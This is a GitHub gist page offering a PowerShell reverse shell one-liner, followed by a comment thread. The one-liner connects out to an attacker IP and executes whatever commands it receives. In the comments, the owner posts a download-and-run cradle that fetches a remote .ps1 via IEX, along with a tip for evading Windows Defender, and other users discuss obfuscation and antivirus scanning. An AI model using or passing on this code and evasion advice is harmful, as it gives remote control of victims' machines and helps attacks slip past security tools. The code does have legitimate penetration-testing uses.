Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@ThunderSon

This comment has been minimized.

Copy link

ThunderSon commented Jul 9, 2018

Hello. Kindly check my fork to the project. The IP field has a typo.

@egre55

This comment has been minimized.

Copy link
Owner Author

egre55 commented Jul 9, 2018

hey, thanks for the heads up!

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Apr 15, 2019

Using sockets without obfuscation or string encryption is a high risk, windows can log data connexion to the c&c server and some firewalls such as zone alarm block the packets.

@T3nsh0

This comment has been minimized.

Copy link

T3nsh0 commented Aug 7, 2019

@chnz2k how do you add obfuscation to a script ??

@egre55

This comment has been minimized.

Copy link
Owner Author

egre55 commented Aug 9, 2019

the Invoke-Obfuscation project is definitely worth checking out @PLEASEFORGETME2

@Vedant-Bhalgama

This comment has been minimized.

Copy link

Vedant-Bhalgama commented Jul 25, 2020

Which Listener can be used? Netcat? or msfconsole?

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

Vedant-Bhalgama commented Jul 25, 2020

Ok, But can we obfuscate this script? And when i run the script it says this.

Capture

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

Vedant-Bhalgama commented Jul 25, 2020

Yes it is working now! But how to obfuscate it?

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

Vedant-Bhalgama commented Jul 25, 2020

Thanks Mate!

@Vedant-Bhalgama

This comment has been minimized.

Copy link

Vedant-Bhalgama commented Jul 25, 2020

And where i can scan for the results of .ps1 file? It doesnt works on anti scan.me and nodistribute also doesnt works

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

Vedant-Bhalgama commented Jul 25, 2020

Hi!
I tried to run the code and i got a connection but when i type any command the connection exits, And on the powershell side i have output like this

Capture
Capture

Also I am sharing the code which will download the reverse shell .ps1 from the kali server, and executes it.
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4/mypowershell.ps1');mypowershell.ps1"

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

Vedant-Bhalgama commented Jul 25, 2020

Also it ran first time but second time it was detected.

@egre55

This comment has been minimized.

Copy link
Owner Author

egre55 commented Jul 25, 2020

try this: powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.0.2.4:443/mypowershell.ps1')" @Vedant-Bhalgama

with your reverse shell looking like:

$client = New-Object System.Net.Sockets.TCPClient("10.0.2.4",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

you should get a shell on your Netcat listener on port 80

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Jul 25, 2020

@egre55

This comment has been minimized.

Copy link
Owner Author

egre55 commented Jul 25, 2020

if you want to evade Defender, you can replace "PS " + (pwd).Path + "> " with "#"

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

Vedant-Bhalgama commented Jul 25, 2020

Yes! I am not using it for Non Ethical purposes bro! I am a Ethical Hacker and need this for pentensting purpose!

@chnz2k

This comment has been minimized.

Copy link

chnz2k commented Jul 25, 2020

@Vedant-Bhalgama

This comment has been minimized.

Copy link

Vedant-Bhalgama commented Jul 25, 2020

Script Is running now but it gives detection error
@egre55, What were you telling to replace? to evade defender? Can u do the changes in the code?

Capture

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.